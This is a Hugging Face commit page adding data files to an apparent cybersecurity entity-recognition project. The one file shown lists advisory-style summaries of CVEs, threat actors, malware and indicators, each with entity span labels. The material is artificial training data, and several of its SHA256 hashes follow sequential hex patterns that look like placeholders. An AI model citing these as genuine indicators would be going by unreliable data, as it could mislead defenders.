chairulridjal commited on
Commit
df108c1
·
verified ·
1 Parent(s): 0a8fc6c

Add files using upload-large-folder tool

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. data/processed/backup/aggregated_13class_test.jsonl +0 -0
  2. data/processed/backup/aggregated_13class_train.jsonl +0 -0
  3. data/processed/backup/aggregated_5class_train.jsonl +0 -0
  4. data/processed/backup/aggregated_5class_valid.jsonl +0 -0
  5. data/processed/backup/cyner2_5class_test.jsonl +0 -0
  6. data/processed/backup/cyner2_5class_train.jsonl +0 -0
  7. data/processed/backup/cyner2_5class_valid.jsonl +0 -0
  8. data/processed/backup/cyner2_8class_test.jsonl +0 -0
  9. data/processed/backup/cyner2_8class_train.jsonl +0 -0
  10. data/processed/backup/cyner2_8class_valid.jsonl +0 -0
  11. data/processed/backup/cyner_test.jsonl +0 -0
  12. data/processed/backup/cyner_train.jsonl +0 -0
  13. data/processed/backup/cyner_valid.jsonl +0 -0
  14. data/processed/backup/enriched_13class_test.jsonl +0 -0
  15. data/processed/backup/enriched_13class_valid.jsonl +0 -0
  16. data/processed/backup/enriched_5class_test.jsonl +0 -0
  17. data/processed/backup/enriched_5class_valid.jsonl +0 -0
  18. data/processed/backup/llm_annotated_apt.jsonl +0 -0
  19. data/processed/backup/llm_annotated_cisa.jsonl +40 -0
  20. data/processed/backup/llm_annotated_exploitdb.jsonl +0 -0
  21. data/processed/backup/llm_annotated_malware.jsonl +25 -0
  22. data/processed/backup/llm_annotated_mitre.jsonl +0 -0
  23. data/processed/backup/llm_annotated_mitre_v2.jsonl +0 -0
  24. data/processed/backup/llm_annotated_news.jsonl +51 -0
  25. data/processed/backup/llm_annotated_nvd.jsonl +0 -0
  26. data/processed/backup/llm_annotated_nvd_v2.jsonl +0 -0
  27. data/processed/backup/llm_annotated_vendor_blogs.jsonl +67 -0
  28. data/processed/backup/llm_generated_synthetic.jsonl +100 -0
  29. data/processed/backup/llm_generated_synthetic_v2.jsonl +0 -0
  30. data/processed/backup/securebert2_test.jsonl +200 -0
  31. data/processed/backup/securebert2_train.jsonl +0 -0
  32. data/raw/APTNER/APTNERdev.txt +0 -0
  33. data/raw/APTNER/APTNERtest.txt +0 -0
  34. data/raw/APTNER/APTNERtrain.txt +0 -0
  35. data/raw/APTNER/README.md +6 -0
  36. data/raw/CyNER/.gitignore +15 -0
  37. data/raw/CyNER/CyNER Demo.ipynb +254 -0
  38. data/raw/CyNER/LICENSE.txt +21 -0
  39. data/raw/CyNER/README.md +41 -0
  40. data/raw/CyNER/requirements.txt +19 -0
  41. data/raw/CyNER/setup.cfg +2 -0
  42. data/raw/CyNER/setup.py +51 -0
  43. data/raw/CyberNER_harmonized/.gitignore +63 -0
  44. data/raw/CyberNER_harmonized/README.md +12 -0
  45. data/raw/DNRTI/README.md +4 -0
  46. data/raw/DNRTI/arguments.py +152 -0
  47. data/raw/DNRTI/construct_input.py +45 -0
  48. data/raw/DNRTI/data_processing.py +193 -0
  49. data/raw/DNRTI/data_utils.py +424 -0
  50. data/raw/DNRTI/main.py +276 -0
data/processed/backup/aggregated_13class_test.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/aggregated_13class_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/aggregated_5class_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/aggregated_5class_valid.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner2_5class_test.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner2_5class_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner2_5class_valid.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner2_8class_test.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner2_8class_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner2_8class_valid.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner_test.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/cyner_valid.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/enriched_13class_test.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/enriched_13class_valid.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/enriched_5class_test.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/enriched_5class_valid.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_apt.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_cisa.jsonl ADDED
@@ -0,0 +1,40 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "CISA has added CVE-2026-39987 to the Known Exploited Vulnerabilities Catalog. Marimo contains a pre-authorization remote code execution vulnerability, allowing an unauthenticated attacker to gain shell access and execute arbitrary system commands. Organizations using Marimo should apply patches immediately.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "CVE_ID: CVE-2026-39987": [[15, 29]], "SYSTEM: Marimo": [[78, 84], [268, 274]], "VULNERABILITY: remote code execution vulnerability": [[114, 149]]}, "info": {"id": "cisa_00000", "source": "cisa_advisories"}}
2
+ {"text": "Microsoft Defender is affected by CVE-2026-33825, an insufficient granularity of access control vulnerability that could allow an authorized attacker to escalate privileges locally. Microsoft has released a security update to address this issue. Administrators should apply the patch from the Microsoft Security Response Center.", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "CVE_ID: CVE-2026-33825": [[34, 48]], "VULNERABILITY: insufficient granularity of access control vulnerability": [[53, 109]], "ORGANIZATION: Microsoft": [[0, 9], [182, 191], [293, 302]], "ORGANIZATION: Microsoft Security Response Center": [[293, 327]]}, "info": {"id": "cisa_00001", "source": "cisa_advisories"}}
3
+ {"text": "CISA issued Emergency Directive 26-03 to mitigate vulnerabilities in Cisco SD-WAN systems. CVE-2026-20122 affects Cisco Catalyst SD-WAN Manager due to incorrect use of privileged APIs. CVE-2026-20133 exposes sensitive information to unauthorized actors. CVE-2026-20128 involves storing passwords in a recoverable format. Federal agencies must remediate these Cisco vulnerabilities by April 23, 2026.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "SYSTEM: Cisco SD-WAN": [[69, 81]], "CVE_ID: CVE-2026-20122": [[91, 105]], "SYSTEM: Cisco Catalyst SD-WAN Manager": [[114, 143]], "VULNERABILITY: incorrect use of privileged APIs": [[151, 183]], "CVE_ID: CVE-2026-20133": [[185, 199]], "CVE_ID: CVE-2026-20128": [[254, 268]], "VULNERABILITY: storing passwords in a recoverable format": [[278, 319]], "ORGANIZATION: Cisco": [[69, 74], [114, 119], [359, 364]]}, "info": {"id": "cisa_00002", "source": "cisa_advisories"}}
4
+ {"text": "CVE-2026-20131 is a critical deserialization of untrusted data vulnerability in Cisco Secure Firewall Management Center and Cisco Security Cloud Control. An unauthenticated, remote attacker could execute arbitrary Java code as root on affected devices. This vulnerability has been associated with known ransomware campaigns. CISA urges all organizations to prioritize patching.", "spans": {"CVE_ID: CVE-2026-20131": [[0, 14]], "VULNERABILITY: deserialization of untrusted data vulnerability": [[29, 76]], "SYSTEM: Cisco Secure Firewall Management Center": [[80, 119]], "SYSTEM: Cisco Security Cloud Control": [[124, 152]], "ORGANIZATION: CISA": [[325, 329]]}, "info": {"id": "cisa_00003", "source": "cisa_advisories"}}
5
+ {"text": "Fortinet has disclosed CVE-2026-21643, a SQL injection vulnerability in FortiClient EMS that may allow an unauthenticated attacker to execute unauthorized code via specifically crafted HTTP requests. Additionally, CVE-2026-35616 describes an improper access control vulnerability in FortiClient EMS. Fortinet customers should consult FortiGuard advisories and upgrade to patched versions immediately.", "spans": {"ORGANIZATION: Fortinet": [[0, 8], [300, 308]], "CVE_ID: CVE-2026-21643": [[23, 37]], "VULNERABILITY: SQL injection vulnerability": [[41, 68]], "SYSTEM: FortiClient EMS": [[72, 87], [283, 298]], "CVE_ID: CVE-2026-35616": [[214, 228]], "VULNERABILITY: improper access control vulnerability": [[242, 279]], "ORGANIZATION: FortiGuard": [[334, 344]]}, "info": {"id": "cisa_00004", "source": "cisa_advisories"}}
6
+ {"text": "Ivanti Endpoint Manager Mobile is vulnerable to CVE-2026-1340, a code injection vulnerability that allows unauthenticated remote code execution. Separately, CVE-2026-1603 affects Ivanti Endpoint Manager with an authentication bypass vulnerability. Ivanti has released security updates for both products. CISA recommends all federal agencies apply mitigations per Ivanti's guidance.", "spans": {"SYSTEM: Ivanti Endpoint Manager Mobile": [[0, 30]], "CVE_ID: CVE-2026-1340": [[48, 61]], "VULNERABILITY: code injection vulnerability": [[65, 93]], "CVE_ID: CVE-2026-1603": [[157, 170]], "SYSTEM: Ivanti Endpoint Manager": [[0, 23], [179, 202]], "VULNERABILITY: authentication bypass vulnerability": [[211, 246]], "ORGANIZATION: Ivanti": [[0, 6], [179, 185], [248, 254], [363, 369]], "ORGANIZATION: CISA": [[304, 308]]}, "info": {"id": "cisa_00005", "source": "cisa_advisories"}}
7
+ {"text": "The Apache Software Foundation has patched CVE-2026-34197, an improper input validation vulnerability in Apache ActiveMQ that allows for code injection. Organizations running Apache ActiveMQ should upgrade to the latest version. This vulnerability was added to the CISA KEV catalog on April 16, 2026.", "spans": {"ORGANIZATION: Apache Software Foundation": [[4, 30]], "CVE_ID: CVE-2026-34197": [[43, 57]], "VULNERABILITY: improper input validation vulnerability": [[62, 101]], "SYSTEM: Apache ActiveMQ": [[105, 120], [175, 190]], "ORGANIZATION: CISA": [[265, 269]]}, "info": {"id": "cisa_00006", "source": "cisa_advisories"}}
8
+ {"text": "CVE-2025-53521 is a stack-based buffer overflow vulnerability in F5 BIG-IP APM that could allow remote code execution. F5 has released mitigation guidance and urges customers to check for signs of compromise. CISA added this vulnerability to the KEV catalog with a remediation deadline of March 30, 2026.", "spans": {"CVE_ID: CVE-2025-53521": [[0, 14]], "VULNERABILITY: stack-based buffer overflow vulnerability": [[20, 61]], "SYSTEM: F5 BIG-IP APM": [[65, 78]], "ORGANIZATION: F5": [[65, 67], [119, 121]], "ORGANIZATION: CISA": [[209, 213]]}, "info": {"id": "cisa_00007", "source": "cisa_advisories"}}
9
+ {"text": "Aquasecurity Trivy is affected by CVE-2026-33634, an embedded malicious code vulnerability representing a supply chain compromise. Exploitation could allow an attacker to access all tokens, SSH keys, cloud credentials, and database passwords in the CI/CD environment. Organizations should audit their Trivy installations and follow vendor remediation steps.", "spans": {"SYSTEM: Trivy": [[13, 18], [301, 306]], "CVE_ID: CVE-2026-33634": [[34, 48]], "VULNERABILITY: embedded malicious code vulnerability": [[53, 90]], "VULNERABILITY: supply chain compromise": [[106, 129]]}, "info": {"id": "cisa_00008", "source": "cisa_advisories"}}
10
+ {"text": "CISA warns that CVE-2026-3055 affects Citrix NetScaler ADC, NetScaler Gateway, and NetScaler ADC FIPS when configured as a SAML identity provider. This out-of-bounds read vulnerability could lead to memory overread. Citrix has published remediation guidance. Federal agencies must comply with BOD 22-01.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "CVE_ID: CVE-2026-3055": [[16, 29]], "SYSTEM: Citrix NetScaler ADC": [[38, 58]], "SYSTEM: NetScaler Gateway": [[60, 77]], "VULNERABILITY: out-of-bounds read vulnerability": [[152, 184]], "ORGANIZATION: Citrix": [[38, 44], [216, 222]]}, "info": {"id": "cisa_00009", "source": "cisa_advisories"}}
11
+ {"text": "Broadcom VMware Aria Operations, formerly known as vRealize Operations, is impacted by CVE-2026-22719, a command injection vulnerability that allows unauthenticated remote code execution. Qualcomm has also disclosed CVE-2026-21385, a memory corruption vulnerability affecting multiple chipsets. Both vulnerabilities were added to the CISA KEV catalog on March 3, 2026.", "spans": {"SYSTEM: VMware Aria Operations": [[9, 31]], "ORGANIZATION: Broadcom": [[0, 8]], "CVE_ID: CVE-2026-22719": [[87, 101]], "VULNERABILITY: command injection vulnerability": [[105, 136]], "ORGANIZATION: Qualcomm": [[188, 196]], "CVE_ID: CVE-2026-21385": [[216, 230]], "VULNERABILITY: memory corruption vulnerability": [[234, 265]], "ORGANIZATION: CISA": [[334, 338]]}, "info": {"id": "cisa_00010", "source": "cisa_advisories"}}
12
+ {"text": "Google has patched two critical zero-day vulnerabilities in Chromium. CVE-2026-3910 is an improper restriction of operations within the bounds of a memory buffer in Chromium V8 that could allow remote code execution via a crafted HTML page. CVE-2026-5281 is a use-after-free vulnerability in Google Dawn. Both affect Google Chrome, Microsoft Edge, and Opera.", "spans": {"ORGANIZATION: Google": [[0, 6], [292, 298], [317, 323]], "SYSTEM: Chromium": [[60, 68], [165, 173]], "CVE_ID: CVE-2026-3910": [[70, 83]], "VULNERABILITY: improper restriction of operations within the bounds of a memory buffer": [[90, 161]], "SYSTEM: Chromium V8": [[165, 176]], "CVE_ID: CVE-2026-5281": [[241, 254]], "VULNERABILITY: use-after-free vulnerability": [[260, 288]], "SYSTEM: Google Dawn": [[292, 303]], "SYSTEM: Google Chrome": [[317, 330]], "SYSTEM: Microsoft Edge": [[332, 346]], "SYSTEM: Opera": [[352, 357]]}, "info": {"id": "cisa_00011", "source": "cisa_advisories"}}
13
+ {"text": "Apple has released security updates addressing CVE-2025-43510, an improper locking vulnerability affecting watchOS, iOS, iPadOS, macOS, visionOS, and tvOS. CVE-2025-43520 is a classic buffer overflow vulnerability in the same Apple products. CVE-2025-31277 is a buffer overflow in Apple Safari that could lead to memory corruption through maliciously crafted web content.", "spans": {"ORGANIZATION: Apple": [[0, 5], [226, 231], [281, 286]], "CVE_ID: CVE-2025-43510": [[47, 61]], "VULNERABILITY: improper locking vulnerability": [[66, 96]], "SYSTEM: watchOS": [[107, 114]], "SYSTEM: iOS": [[116, 119]], "SYSTEM: iPadOS": [[121, 127]], "SYSTEM: macOS": [[129, 134]], "SYSTEM: visionOS": [[136, 144]], "SYSTEM: tvOS": [[150, 154]], "CVE_ID: CVE-2025-43520": [[156, 170]], "VULNERABILITY: buffer overflow vulnerability": [[184, 213]], "CVE_ID: CVE-2025-31277": [[242, 256]], "SYSTEM: Apple Safari": [[281, 293]]}, "info": {"id": "cisa_00012", "source": "cisa_advisories"}}
14
+ {"text": "Microsoft Exchange Server has been added to the CISA KEV catalog for CVE-2023-21529, a deserialization of untrusted data vulnerability that allows authenticated remote code execution. This vulnerability has known usage in ransomware campaigns. Microsoft SharePoint Server is also affected by CVE-2026-32201, an improper input validation vulnerability enabling spoofing attacks over a network.", "spans": {"SYSTEM: Microsoft Exchange Server": [[0, 25]], "ORGANIZATION: CISA": [[48, 52]], "CVE_ID: CVE-2023-21529": [[69, 83]], "VULNERABILITY: deserialization of untrusted data vulnerability": [[87, 134]], "SYSTEM: Microsoft SharePoint Server": [[244, 271]], "CVE_ID: CVE-2026-32201": [[292, 306]], "VULNERABILITY: improper input validation vulnerability": [[311, 350]]}, "info": {"id": "cisa_00013", "source": "cisa_advisories"}}
15
+ {"text": "SolarWinds Web Help Desk is affected by CVE-2025-26399, a deserialization of untrusted data vulnerability in the AjaxProxy component that could allow command execution on the host machine. SolarWinds urges customers to apply the hotfix for Web Help Desk version 12.8.7. CISA added this to the KEV catalog with a March 12, 2026 deadline.", "spans": {"SYSTEM: SolarWinds Web Help Desk": [[0, 24]], "CVE_ID: CVE-2025-26399": [[40, 54]], "VULNERABILITY: deserialization of untrusted data vulnerability": [[58, 105]], "ORGANIZATION: SolarWinds": [[0, 10], [189, 199]], "ORGANIZATION: CISA": [[270, 274]]}, "info": {"id": "cisa_00014", "source": "cisa_advisories"}}
16
+ {"text": "The FBI, CISA, and NSA have released a joint cybersecurity advisory warning that Volt Typhoon, a People's Republic of China state-sponsored threat actor, has compromised critical infrastructure networks. The threat actor exploited CVE-2023-46805 and CVE-2024-21887 in Ivanti Connect Secure to gain initial access. Volt Typhoon leveraged living-off-the-land techniques using PowerShell, WMI, and ntdsutil.exe to extract Active Directory credentials.", "spans": {"ORGANIZATION: FBI": [[4, 7]], "ORGANIZATION: CISA": [[9, 13]], "ORGANIZATION: NSA": [[19, 22]], "THREAT_ACTOR: Volt Typhoon": [[81, 93], [314, 326]], "CVE_ID: CVE-2023-46805": [[231, 245]], "CVE_ID: CVE-2024-21887": [[250, 264]], "SYSTEM: Ivanti Connect Secure": [[268, 289]], "TOOL: PowerShell": [[374, 384]], "TOOL: WMI": [[386, 389]], "TOOL: ntdsutil.exe": [[395, 407]], "SYSTEM: Active Directory": [[419, 435]]}, "info": {"id": "cisa_00015", "source": "cisa_advisories"}}
17
+ {"text": "APT29, also known as Cozy Bear, has been observed exploiting CVE-2023-42793 in JetBrains TeamCity to gain initial access to victim networks. The threat group deployed a custom backdoor communicating with the command and control server at 185.193.126.51 over HTTPS. Mandiant and Microsoft have attributed this campaign to the Russian Foreign Intelligence Service. The attackers used Mimikatz for credential harvesting and Cobalt Strike beacons for lateral movement.", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "THREAT_ACTOR: Cozy Bear": [[21, 30]], "CVE_ID: CVE-2023-42793": [[61, 75]], "SYSTEM: JetBrains TeamCity": [[79, 97]], "IP_ADDRESS: 185.193.126.51": [[238, 252]], "ORGANIZATION: Mandiant": [[265, 273]], "ORGANIZATION: Microsoft": [[278, 287]], "TOOL: Mimikatz": [[382, 390]], "MALWARE: Cobalt Strike": [[421, 434]]}, "info": {"id": "cisa_00016", "source": "cisa_advisories"}}
18
+ {"text": "CISA and FBI warn that the ransomware group known as BlackCat (ALPHV) is targeting the healthcare sector. Actors have been observed exploiting CVE-2021-44228 in Apache Log4j and CVE-2024-1709 in ConnectWise ScreenConnect for initial access. Indicators of compromise include the domain api.clearnetwork[.]org and the SHA256 hash a3e4b0e7f8c2d1a6b9c5d3e2f1a0b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2a1. Victims should report incidents to the FBI Internet Crime Complaint Center.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "ORGANIZATION: FBI": [[9, 12], [433, 436]], "MALWARE: BlackCat": [[53, 61]], "THREAT_ACTOR: ALPHV": [[63, 68]], "CVE_ID: CVE-2021-44228": [[143, 157]], "SYSTEM: Apache Log4j": [[161, 173]], "CVE_ID: CVE-2024-1709": [[178, 191]], "SYSTEM: ConnectWise ScreenConnect": [[195, 220]], "DOMAIN: api.clearnetwork[.]org": [[285, 307]], "HASH: a3e4b0e7f8c2d1a6b9c5d3e2f1a0b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2a1": [[328, 392]], "ORGANIZATION: FBI Internet Crime Complaint Center": [[433, 468]]}, "info": {"id": "cisa_00017", "source": "cisa_advisories"}}
19
+ {"text": "The Lazarus Group exploited CVE-2022-47966 in Zoho ManageEngine to deploy the QuiteRAT backdoor. After gaining access, the threat actor dropped a malicious DLL at C:\\Windows\\System32\\wsmprovhost.dll and established persistence via scheduled tasks. Network indicators include connections to 104.168.174.32 and the domain update.microsoft-store[.]net. The SHA256 hash of the QuiteRAT payload is 7f8e3c2d1b0a9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c3b2a1f0e9d8c7b6a5f4e.", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "CVE_ID: CVE-2022-47966": [[28, 42]], "SYSTEM: Zoho ManageEngine": [[46, 63]], "MALWARE: QuiteRAT": [[78, 86], [373, 381]], "FILEPATH: C:\\Windows\\System32\\wsmprovhost.dll": [[163, 198]], "IP_ADDRESS: 104.168.174.32": [[290, 304]], "DOMAIN: update.microsoft-store[.]net": [[320, 348]], "HASH: 7f8e3c2d1b0a9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c3b2a1f0e9d8c7b6a5f4e": [[393, 457]]}, "info": {"id": "cisa_00018", "source": "cisa_advisories"}}
20
+ {"text": "Sandworm Team, attributed to Russia's GRU Unit 74455, deployed the Industroyer2 malware targeting Ukrainian power grid infrastructure. The attack leveraged CVE-2021-27065 in Microsoft Exchange Server for initial access. Post-exploitation tools included PsExec for lateral movement and CaddyWiper for destructive operations. CISA, NSA, and the UK National Cyber Security Centre issued a joint advisory warning critical infrastructure operators.", "spans": {"THREAT_ACTOR: Sandworm Team": [[0, 13]], "ORGANIZATION: GRU": [[38, 41]], "MALWARE: Industroyer2": [[67, 79]], "CVE_ID: CVE-2021-27065": [[156, 170]], "SYSTEM: Microsoft Exchange Server": [[174, 199]], "TOOL: PsExec": [[253, 259]], "MALWARE: CaddyWiper": [[285, 295]], "ORGANIZATION: CISA": [[324, 328]], "ORGANIZATION: NSA": [[330, 333]], "ORGANIZATION: UK National Cyber Security Centre": [[343, 376]]}, "info": {"id": "cisa_00019", "source": "cisa_advisories"}}
21
+ {"text": "Cl0p ransomware operators have been mass-exploiting CVE-2023-34362 in MOVEit Transfer to exfiltrate data from hundreds of organizations. The SQL injection vulnerability in Progress MOVEit allows unauthenticated access to the application database. Webshells were deployed at /MOVEit/human2.aspx on compromised servers. CISA and FBI released indicators including the IP addresses 5.252.190.141, 148.113.152.104, and 89.39.104.1. Organizations should review their MOVEit Transfer logs for unauthorized access.", "spans": {"MALWARE: Cl0p": [[0, 4]], "CVE_ID: CVE-2023-34362": [[52, 66]], "SYSTEM: MOVEit Transfer": [[70, 85], [461, 476]], "VULNERABILITY: SQL injection vulnerability": [[141, 168]], "SYSTEM: MOVEit": [[70, 76], [181, 187], [275, 281], [461, 467]], "FILEPATH: /MOVEit/human2.aspx": [[274, 293]], "ORGANIZATION: CISA": [[318, 322]], "ORGANIZATION: FBI": [[327, 330]], "IP_ADDRESS: 5.252.190.141": [[378, 391]], "IP_ADDRESS: 148.113.152.104": [[393, 408]], "IP_ADDRESS: 89.39.104.1": [[414, 425]]}, "info": {"id": "cisa_00020", "source": "cisa_advisories"}}
22
+ {"text": "The Kimsuky threat group has been conducting targeted spear-phishing campaigns exploiting CVE-2017-11882 in Microsoft Office and CVE-2022-30190 in the Microsoft Support Diagnostic Tool (MSDT). Malicious documents download a second-stage payload from hxxps://drive.google-analytics[.]cloud/update.exe. The payload establishes a connection to 193.56.29.174 on port 443. SHA256 of the dropper: 5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b.", "spans": {"THREAT_ACTOR: Kimsuky": [[4, 11]], "CVE_ID: CVE-2017-11882": [[90, 104]], "SYSTEM: Microsoft Office": [[108, 124]], "CVE_ID: CVE-2022-30190": [[129, 143]], "SYSTEM: Microsoft Support Diagnostic Tool": [[151, 184]], "URL: hxxps://drive.google-analytics[.]cloud/update.exe": [[250, 299]], "IP_ADDRESS: 193.56.29.174": [[341, 354]], "HASH: 5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b": [[391, 455]]}, "info": {"id": "cisa_00021", "source": "cisa_advisories"}}
23
+ {"text": "CISA Alert AA24-131A warns of Black Basta ransomware affiliates exploiting CVE-2024-1709 in ConnectWise ScreenConnect and CVE-2024-3400 in Palo Alto Networks PAN-OS GlobalProtect. After initial access, affiliates deploy SystemBC proxy malware and use rclone for data exfiltration to attacker-controlled infrastructure. The campaign has impacted over 500 organizations globally. FBI and CISA recommend implementing phishing-resistant multi-factor authentication.", "spans": {"ORGANIZATION: CISA": [[0, 4], [386, 390]], "MALWARE: Black Basta": [[30, 41]], "CVE_ID: CVE-2024-1709": [[75, 88]], "SYSTEM: ConnectWise ScreenConnect": [[92, 117]], "CVE_ID: CVE-2024-3400": [[122, 135]], "SYSTEM: PAN-OS GlobalProtect": [[158, 178]], "ORGANIZATION: Palo Alto Networks": [[139, 157]], "MALWARE: SystemBC": [[220, 228]], "TOOL: rclone": [[251, 257]], "ORGANIZATION: FBI": [[378, 381]]}, "info": {"id": "cisa_00022", "source": "cisa_advisories"}}
24
+ {"text": "The LockBit 3.0 ransomware group has been exploiting CVE-2023-4966, known as Citrix Bleed, to bypass authentication on Citrix NetScaler ADC and Gateway appliances. Post-compromise activity includes deploying Cobalt Strike beacons and using Impacket for lateral movement. Network defenders should look for connections to the following indicators: 91.215.85.183, 193.142.59.11, and the domain lockbit-decryptor[.]com. SHA256 hash of the ransomware binary: 8d4e7f2a1b3c5d6e9f0a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e.", "spans": {"MALWARE: LockBit 3.0": [[4, 15]], "CVE_ID: CVE-2023-4966": [[53, 66]], "SYSTEM: Citrix NetScaler ADC": [[119, 139]], "SYSTEM: Gateway": [[144, 151]], "MALWARE: Cobalt Strike": [[208, 221]], "TOOL: Impacket": [[240, 248]], "IP_ADDRESS: 91.215.85.183": [[346, 359]], "IP_ADDRESS: 193.142.59.11": [[361, 374]], "DOMAIN: lockbit-decryptor[.]com": [[391, 414]], "HASH: 8d4e7f2a1b3c5d6e9f0a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e": [[454, 518]]}, "info": {"id": "cisa_00023", "source": "cisa_advisories"}}
25
+ {"text": "Scattered Spider has compromised cloud environments by exploiting CVE-2023-22515 in Atlassian Confluence and using social engineering to defeat Okta multi-factor authentication. The threat actor deploys the ALPHV/BlackCat ransomware after establishing persistence. Mandiant observed the group using Fleetdeck.io and AnyDesk for remote access. CISA recommends reviewing Okta system logs and Azure Active Directory sign-in logs for anomalous activity.", "spans": {"THREAT_ACTOR: Scattered Spider": [[0, 16]], "CVE_ID: CVE-2023-22515": [[66, 80]], "SYSTEM: Atlassian Confluence": [[84, 104]], "SYSTEM: Okta": [[144, 148], [369, 373]], "MALWARE: BlackCat": [[213, 221]], "ORGANIZATION: Mandiant": [[265, 273]], "TOOL: AnyDesk": [[316, 323]], "ORGANIZATION: CISA": [[343, 347]], "SYSTEM: Azure Active Directory": [[390, 412]]}, "info": {"id": "cisa_00024", "source": "cisa_advisories"}}
26
+ {"text": "CISA has released an advisory on CVE-2024-23113, a format string vulnerability in Fortinet FortiOS that allows remote code execution. CVE-2024-47575, known as FortiJump, is a missing authentication vulnerability in FortiManager. Fortinet disclosed that the threat actor UNC5820 exploited FortiJump to exfiltrate configuration data from FortiGate devices. Organizations should check for unauthorized fortigate_access.log entries.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "CVE_ID: CVE-2024-23113": [[33, 47]], "VULNERABILITY: format string vulnerability": [[51, 78]], "SYSTEM: FortiOS": [[91, 98]], "CVE_ID: CVE-2024-47575": [[134, 148]], "VULNERABILITY: missing authentication vulnerability": [[175, 211]], "SYSTEM: FortiManager": [[215, 227]], "ORGANIZATION: Fortinet": [[82, 90], [229, 237]], "THREAT_ACTOR: UNC5820": [[270, 277]], "SYSTEM: FortiGate": [[336, 345]], "FILEPATH: fortigate_access.log": [[399, 419]]}, "info": {"id": "cisa_00025", "source": "cisa_advisories"}}
27
+ {"text": "Microsoft Threat Intelligence has identified Storm-0558 exploiting a token validation vulnerability to forge Azure Active Directory authentication tokens. The threat actor used a compromised Microsoft account consumer signing key. CVE-2023-36884 was also exploited through malicious Microsoft Office documents. Indicators include the domains token.msoauthapi[.]net and auth.identity-verify[.]net. CISA Emergency Directive 23-02 mandates federal agencies to audit Microsoft 365 environments.", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: Storm-0558": [[45, 55]], "VULNERABILITY: token validation vulnerability": [[69, 99]], "SYSTEM: Azure Active Directory": [[109, 131]], "CVE_ID: CVE-2023-36884": [[231, 245]], "SYSTEM: Microsoft Office": [[283, 299]], "DOMAIN: token.msoauthapi[.]net": [[342, 364]], "DOMAIN: auth.identity-verify[.]net": [[369, 395]], "ORGANIZATION: CISA": [[397, 401]], "SYSTEM: Microsoft 365": [[463, 476]]}, "info": {"id": "cisa_00026", "source": "cisa_advisories"}}
28
+ {"text": "Iranian state-sponsored actors known as MuddyWater have been deploying the Atera Agent and SimpleHelp remote monitoring tools to maintain persistence on victim networks. The group exploited CVE-2021-34473 and CVE-2021-34523 in Microsoft Exchange Server, known as ProxyShell, along with CVE-2021-31207. CISA and the UK NCSC attribute this activity to Iran's Ministry of Intelligence and Security. Post-exploitation involved running certutil.exe to download additional payloads.", "spans": {"THREAT_ACTOR: MuddyWater": [[40, 50]], "TOOL: Atera Agent": [[75, 86]], "TOOL: SimpleHelp": [[91, 101]], "CVE_ID: CVE-2021-34473": [[190, 204]], "CVE_ID: CVE-2021-34523": [[209, 223]], "SYSTEM: Microsoft Exchange Server": [[227, 252]], "CVE_ID: CVE-2021-31207": [[286, 300]], "ORGANIZATION: CISA": [[302, 306]], "ORGANIZATION: UK NCSC": [[315, 322]], "TOOL: certutil.exe": [[431, 443]]}, "info": {"id": "cisa_00027", "source": "cisa_advisories"}}
29
